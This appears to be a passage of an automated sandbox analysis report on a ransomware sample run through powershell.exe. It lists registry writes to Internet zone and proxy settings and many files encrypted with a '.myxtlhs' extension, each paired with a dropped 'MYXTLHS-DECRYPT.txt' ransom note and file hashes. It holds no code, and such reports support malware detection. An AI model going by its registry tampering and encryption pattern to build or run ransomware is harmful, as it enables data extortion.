E9BD07A4D3151E3830DC50B745EE053C46028ED78DD4FACD599C7590EFE8E1F05B3AC85CE5B374DBD16CD971ABAEC7BFCA5566752033DC468C3DE133FC9152D68C64174F7260220DFD3619BFE92FC29E3098B1076D6BAC49F937DD95E6777D6CB6F1D3032C98E2B7419A9459A0603773B2C005B43B82CC76655EC173B90D1020906A63355AB388A7D8F6475DABB275C3AD6157C2F8E8B0EADE210361F9FDBB2EFF459C00DF35E8179D093DD91F24914B3727B5E593831D01D12F078942303BE11D970CB17CF2769AF9F7A9479884DA05479D68B11D6C2B3DF49CBED05558BBFA8F0ED5524CB465BB9EE3FD551AFBE940D4C7CD3B38C8441B1364F9FFF0B8C4C27ADCC11E303C56D5A16B28A5DA2C0D9A6CAA553FF46676F4F3E2AE44E16F2DE398D194F81E606DACAA64CED3D9F8DDBE96A7CE82E7D98616562859B01EE66D4288A79B2F46E3ACA8B48969EE775B891A3642DED981AAD4D353CF2AA46825951B0F593EE289F1C86741078F06111EADF66B06E296D6017766C32587B0EE3959232C5DAAC16D78E215AFD9CA3EBC54383A20F9D24DEA9B9DF483341A1137D20A134EC414E0F69270B9FB3801786F14BC1D8F0319D90C554AC561C897C645A7B0725B556B7696B6A231C46D020A0AFEB0DBA8034E606C823065CF21EC7AA84976DAFD7C806EBCDFEFA1100C46A3AFF14F6B22C86CD476C4F5EDAF7DB25F62E6AED01BD51DFCA7169272E1D198D856321802E9571A712BC8A44AFFAAC39F78A1608F2FF968B2F0B94B17B0C792B2EA9FEE57C7F4C676DEA76CFF773970546E7355BB70B9119D043A07723621D27825E41BE129168A9B13236F47752F504583D312A956472C039775988A50F517C170
1684
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1684
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
1684
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
1684
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000

Files activity

Executable files
0
Suspicious files
284
Text files
217
Unknown types
11

Dropped files

PID
Process
Filename
Type
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 406d10f5c827ea36a9b0742142920e72
SHA256: 8ba09ebe1cc1b8a836427d11f9f2b2d65343665ddb4b6be2ab26d744a2b88d6b
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 8198045766233563078130897913e5ac
SHA256: 3c16c48233055748ab3f7b880c827b356f5ea370b837ad08fd29f50fdaa4df34
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 2dd5634824f38092cfcf9868bab6213c
SHA256: eb289aa0ac192ba0249f3111cb5ca26fc1d73fa00961dea6e5b8920cf3b56fcc
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 59b644a561545c8031ba64e76a00ac3d
SHA256: 54ba2ff689f71bd8508b0e9a3f2bd484f4de7ac8ff1b5ee8f0972de6c58434bb
1684
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
binary
MD5: f7f2f00b494e5743e5ff6f09be9f01b8
SHA256: 270dc1612de6fd5c6316d4afbd9941ab87aa32683677ed0bcb691c08d4b05821
1684
powershell.exe
C:\Users\admin\AppData\Local\Temp\Tar978F.tmp
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Local\Temp\Cab978E.tmp
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
compressed
MD5: 2af3e4b57a8b637fcee8cb7485986fa3
SHA256: 10632f5e8df34d4641f11aa0ad917a629bf75f7c0eaa77506c5a27919e7b12aa
1684
powershell.exe
C:\Users\admin\AppData\Local\Temp\Cab96B1.tmp
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Local\Temp\Tar96B2.tmp
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Local\Temp\Tar9681.tmp
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Local\Temp\Cab9680.tmp
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 323c3ede3e8ade45f5d776ac3a936d36
SHA256: c63a32da3b955a572a76f1a617ce5c063a3db9139629268c6481e3a4925c4013
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: f132b6df535d5aa9d6b0c4684c9d4a02
SHA256: cf6be448ddd4e3f7b6a3837044117b35d3cdcaac25b11be35a5271eb59d52906
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: ce79a526a60ab00c2f0e3aa895d4279f
SHA256: a318020dde72118f7fed48a62ca6775bed94b1fa4427cd8ff189e9aa97a5fdde
1684
powershell.exe
C:\Users\admin\AppData\Local\Temp\pidor.bmp
image
MD5: d8f7e5c8b904008d878e305c856fada6
SHA256: efedd976b441c108b976eeb11f353a8fb5cb2e26e8782ed511dbd6bafbb76698
1684
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.myxtlhs
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Videos\Sample Videos\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.myxtlhs
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Recorded TV\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.myxtlhs
binary
MD5: 674850293bda813088556e1f8e44265f
SHA256: 13815496b0ebef23c7f2fa2426ac1349335f5941d9c59206f584c5b3d5ab86e0
1684
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.myxtlhs
binary
MD5: f24d0b1a2d112398a3ac9b42bfc114c8
SHA256: 47c17a8b22131655306cc4c01f487494ee496e385937a08264e41da5047c64a8
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.myxtlhs
binary
MD5: 89fa72c779906b3cdb246730ca678f8e
SHA256: 5970678006047955e50785ab13e2bbf2fcd73663e762204d3d4251a200226ffb
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.myxtlhs
pgc
MD5: 13a312536fe1426b3f173f4535099bcb
SHA256: ee09eb3f6ee213bf26e811af56c644c9a5d4ba253e8f81d6138428dd4301db84
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.myxtlhs
binary
MD5: 38a14b34e0d380ae1e7f1252aa5b5716
SHA256: 21e6590ed40292695b4a9f6f534d442fc7ea0a0afd5a1a2eb1dc75475b3177da
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.myxtlhs
binary
MD5: 44fb45bbb114685a8604bac719051015
SHA256: 8b6a4d57a227726c3911b5f2a9bcbe96650bab78be6b713b32703361ce8cc64b
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.myxtlhs
binary
MD5: 26247de3efc5232d835762ff94d18cd6
SHA256: 2740fff5ba3ac78257de40a2bd0198bd718a540973811aea659a0e8f93da9860
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.myxtlhs
binary
MD5: 0d2b9db81545ca1c1d8e556f7d481e8f
SHA256: 68365cd3d5d48163a04819bfffe5c10eb9e911758bf33a38e9b852f766a436d3
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.myxtlhs
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.myxtlhs
binary
MD5: 9e1cee3a695f2efdc687cf375fb6f21d
SHA256: f2c09e7fd151d1c8e886744a2384426b03d4ae52d25250967899996d8431e2c2
1684
powershell.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3.myxtlhs
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Music\Sample Music\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\Public\Libraries\RecordedTV.library-ms.myxtlhs
binary
MD5: ee30c8ee1e0137ea78aca28d3fe0461d
SHA256: c13db0c7fbef0ecf82e6ea418cee9c255693ac375f50e8310af061f5f96badc4
1684
powershell.exe
C:\Users\Public\Libraries\RecordedTV.library-ms
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\Public\Favorites\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\Public\Libraries\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\Public\Pictures\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\Public\Videos\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\Public\Downloads\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\Public\Documents\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\Public\Music\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\Public\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\SendTo\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms.myxtlhs
binary
MD5: 632e48161efaec7e709ae923768d3e0d
SHA256: d781d533ae543398df94cbe7001218bc2d7ffcf3930a567687a80761ff1ee77d
1684
powershell.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms.myxtlhs
binary
MD5: 5730ea2f045d77e076a057bd21012bed
SHA256: 32fb44997bfaedbee795d5148c79cb76ba9c01c536286bcf9f40f9dcd40d152c
1684
powershell.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Searches\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Saved Games\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Pictures\workpc.png.myxtlhs
binary
MD5: 15395c895767585c79cafd45b6bdecc9
SHA256: 7dfecf548862ce83c52142e3bdec96a5ca21c24088800714b19c44409e053010
1684
powershell.exe
C:\Users\admin\Pictures\workpc.png
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Pictures\favoritecontact.png.myxtlhs
binary
MD5: f54d611b1064c9b465c1e8fd63af12c8
SHA256: 9af4cc0712cf04233b1f5092d1db4d46917823447e6dec1e426201da9dddba64
1684
powershell.exe
C:\Users\admin\Pictures\favoritecontact.png
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Pictures\annualringtones.png.myxtlhs
binary
MD5: 80af555ed282224a0ea43c7dba4c4a4f
SHA256: edc17bf4233c99cd31c3627191c8da47cd4a6f2c09f4449a828ca078728053dd
1684
powershell.exe
C:\Users\admin\Pictures\annualringtones.png
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url.myxtlhs
binary
MD5: 9bc42a8ffb4d3c009aaf1b7cf4b52c1b
SHA256: 97b17f0e8396143c3b2425720bd205eb3202517dcffd9fee4b5dd500cd0ce3e4
1684
powershell.exe
C:\Users\admin\Links\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\ntuser.ini.myxtlhs
binary
MD5: 85c836293629cf6bd47dc46ba15cef49
SHA256: 4e67e2cab827b0cb9a2ae8e04d238ccfda0a5313166a5436fee3ca9dd65c4ca4
1684
powershell.exe
C:\Users\admin\ntuser.ini
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url.myxtlhs
binary
MD5: 30672c975647a4f0120dd9217406ec0c
SHA256: c51a06d74564f1e2c95b6fe26ce3d3da8e489db4f3b2a2bb95941dd2562842fe
1684
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url.myxtlhs
binary
MD5: 22563179603293bb56980ef8faf49501
SHA256: 03ee77ca8ee70276eb729afc2d4e612504ebb7dc5ef46c34537ef44231f36938
1684
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url.myxtlhs
binary
MD5: aa57bcce266a1683ae178cd088fddb5f
SHA256: 67d108262955d8ccc13308ebdf5983123f72efcc00583735b394a5ec90936ed7
1684
powershell.exe
C:\Users\admin\Favorites\Windows Live\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url.myxtlhs
binary
MD5: eb0ca2270406212f7f9cb988a79695a1
SHA256: 419f2c26952d5fcc7cbe0deff7b8f49cef11c6a38e638a5304598b89c4102013
1684
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url.myxtlhs
binary
MD5: 43c55e85a1d77386ae62e3af8b5fff6b
SHA256: 4c20d52d0d3be612d5f74079b8252cba5d2decb1707888e9fbb52833cbfcb72d
1684
powershell.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url.myxtlhs
binary
MD5: ca10d0a20b0fde4c1b1ab5328d6cc023
SHA256: 1eab9bcd3b37aee04da5f85ba01261a55d164cf679a1a8bf6866bc219556eaa0
1684
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url.myxtlhs
binary
MD5: 4b4f4d2773cc7420f7bd2904f9ff2b31
SHA256: 7e1e12bd66424fe9c64f30f9af4c273926bc5cf2eda18ff864ca8a181c82bf46
1684
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url.myxtlhs
binary
MD5: 338c6b8bc8dabbbc9fd5ea253d985d43
SHA256: 0e9bb21f25d046a78416e7ca37aae645f5ea83979eeb8b1bb0503ee4f4e9cc91
1684
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url.myxtlhs
binary
MD5: 6927873704cef811d93e39b38a2a9a43
SHA256: cc1a24496214ce469c0223a01574af7e95cc4b27aaccaced1132948594456d49
1684
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url.myxtlhs
binary
MD5: 649a74666215810f2c28e8e6aff5e43c
SHA256: 0a972700b6c856582dca74332006ffeb9ed4c86bb540b2735024ac0a203ad0de
1684
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url.myxtlhs
binary
MD5: ebd0629884c3a2cad569ef037a7e727f
SHA256: ee07fccfb240619943e101ca57539de73bb195276a176628292be705777f834d
1684
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url.myxtlhs
binary
MD5: 8aafb6f00f6aea87e8443a4daa49362d
SHA256: ff371c829b25f23e24e8d60714fbf3b7914d36e64768471d22194b6b254a5b4a
1684
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url.myxtlhs
binary
MD5: 8471f0abac16267ccf56aafaf23d0555
SHA256: ac406426ecab591d4e7168c9868e4d2f0e3225d19aafb4721da31b917ebe46d5
1684
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.myxtlhs
binary
MD5: 1232a620073a74c8fd81c34dfe52a180
SHA256: a4940e1b253adc609d350907159378ea4baf5cad6cd738cbf83aeef2b7378392
1684
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url.myxtlhs
binary
MD5: 1c87f5af0f6b061d5abfa7342a3bab63
SHA256: 2b31d58702dcbc6a3517e3b5ac43b68ec09a678cd7c8faf35bed7f698d2075f0
1684
powershell.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url.myxtlhs
binary
MD5: c257503b320958dbce338ecc3cb7ce45
SHA256: d246133e5b8617e64bbdf4a6a5e39cf84489d01de92f235290077fc15fc4452d
1684
powershell.exe
C:\Users\admin\Favorites\Links for United States\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url.myxtlhs
binary
MD5: f65195b59cb0644e131440d2a357eec9
SHA256: b34d4a3f2e6dcbefd094e374b12a406f59ce46baf962b46f1479b66aec885d97
1684
powershell.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Downloads\wewatches.png.myxtlhs
binary
MD5: 401675ab479a983e7b89e72fad947f57
SHA256: af06432c743157bd38bed37a609a5aeb801747620b9e5a2400ece37945182693
1684
powershell.exe
C:\Users\admin\Favorites\Links\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url.myxtlhs
binary
MD5: 08fd30833e5cd1891a2867bc9f9d4ea4
SHA256: e47f21c5651f90a0bea71246b63bf03b04beda4b6f13ab8e5e661944178fbad3
1684
powershell.exe
C:\Users\admin\Downloads\wewatches.png
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Downloads\pcschools.png.myxtlhs
binary
MD5: c9ad9773646aa4f35f8b0acb3c924458
SHA256: bcbbac582c1d08104acfeac71a906650fe38ec044c64389fd1b4f0e25d2e6ebd
1684
powershell.exe
C:\Users\admin\Downloads\madevisual.png.myxtlhs
binary
MD5: 9e641cf1033330f54fb5fb73b5f42296
SHA256: 06c94a11b51b2ad49edda882e1b50f7f3f4ea9e0d453a84e277177e7154ca853
1684
powershell.exe
C:\Users\admin\Downloads\treatmentclient.png.myxtlhs
gpg
MD5: 691bb92542d27deb50484c32de402de6
SHA256: 0a568f60f9e83adc924646b50a9c6cda5cc814fb35514168886732212cbbb6fc
1684
powershell.exe
C:\Users\admin\Downloads\pcschools.png
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Downloads\treatmentclient.png
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Downloads\caending.jpg.myxtlhs
binary
MD5: 6df71b5f1aff1d83e3213baac687d525
SHA256: ccbfc46009ee1ed96f0866173a064643c0a2e9cb78c3925a60ec1450b377d724
1684
powershell.exe
C:\Users\admin\Downloads\countriesseason.png.myxtlhs
binary
MD5: 09fda70b96903d235c84b521d7022478
SHA256: aceaa2bfcf6760f2c113b9521a859e49d4380d11c24e42837189b53ecb5ac18c
1684
powershell.exe
C:\Users\admin\Downloads\countriesseason.png
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Downloads\caending.jpg
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Downloads\madevisual.png
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Documents\texasalready.rtf.myxtlhs
binary
MD5: ca716d8b7d21b2f51bfbca1bcf16563f
SHA256: 1b9d1dbdaaa31ec0d3bd3baf1bfa7a1f2643ad164e1c66ce408b1c0349059ea6
1684
powershell.exe
C:\Users\admin\Downloads\MYXTLHS-DECRYPT.txt
text
